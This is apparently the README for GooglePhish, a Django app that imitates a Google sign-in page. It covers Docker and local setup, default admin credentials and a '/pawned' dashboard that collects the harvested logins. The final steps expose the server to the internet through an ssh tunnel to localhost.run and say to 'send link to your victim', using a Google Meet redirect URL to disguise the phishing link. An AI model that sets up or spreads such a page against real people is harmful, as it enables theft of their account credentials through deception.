-
Pull created image
-
Install Docker
-
Pull googlephish image
docker pull dmdhrumilmistry/googlephish
-
run docker image
docker run -d -p 8000:8000 dmdhrumilmistry/googlephish -e
-
-
Build Image and run using build command
sudo docker build -t googlephish .
-
You can specify your credentials using build arguments like this :
sudo docker build -t googlephish -e "DJANGO_SUPERUSER_EMAIL=admin@mail.local" -e "DJANGO_SUPERUSER_USERNAME=admin" -e "DJANGO_SUPERUSER_PASSWORD=GooglePhish" .
-
Run docker container
docker run -d -p 8000:8000 googlephish
If you have build the dockerfile with no arguments, the default credentials are :
- Username :
admin
- Password :
G00g13P#15#23
-
Using Docker Compose
docker-compose up
⚠️ Doesn't work yet
-
Clone/Download repo
git clone https://github.com/dmdhrumilmistry/GooglePhish.git
-
Create virtual environment
python3 -m venv env
-
Load virtual environment
source env/bin/activate
-
Install Poetry
python3 -m pip install poetry
-
Install requirements
poetry install
-
Check for errors
python3 manage.py check
Proceed if no errors were encountered.
-
migrate db
python3 manage.py makemigrations python3 manage.py migrate
-
Create user
python3 manage.py createsuperuser
-
Collect static files
python3 manage.py collectstatic
-
Run server
python3 manage.py runserver
Use
--insecure
tag if any issue is encountered while loading static files.
-
Env File template
DJANGO_SECRET_KEY=secret_key DEBUG=False ALLOWED_HOSTS=* CSRF_TRUSTED_ORIGINS=https://your-domain.ngrok-free.app,https://domain.localhost.run
-
Generate and copy new secret key
python3 generate_new_key.py
-
Set
DEBUG
variable toTrue
only during development stage, else useFalse
-
Set
CSRF_TRUSTED_ORIGINS
while using ssh tunnels such asngrok
andlocalhost.run
. -
update values in
.env
file
-
Dashboard login page
http://127.0.0.1:8000/pawned
python3 manage.py runserver
if static files are not loading, turn on debug mode or use
python3 manage.py runserver --insecure
-
Start server
python3 manage.py runserver
-
forward port using ssh
ssh -R 80:localhost:8000 localhost.run
8000 is port of localhost server. 80 is localhost.run server port. Localhost is service that helps you to expose your server running on localhost to the internet, visit their documentation for more info
-
Now send link to your victim
You can redirect user from google meet to your phishing page link using
https://meet.google.com/linkredirect?dest=your_link
- Create an issue
- Fork the repo, update script and create a Pull Request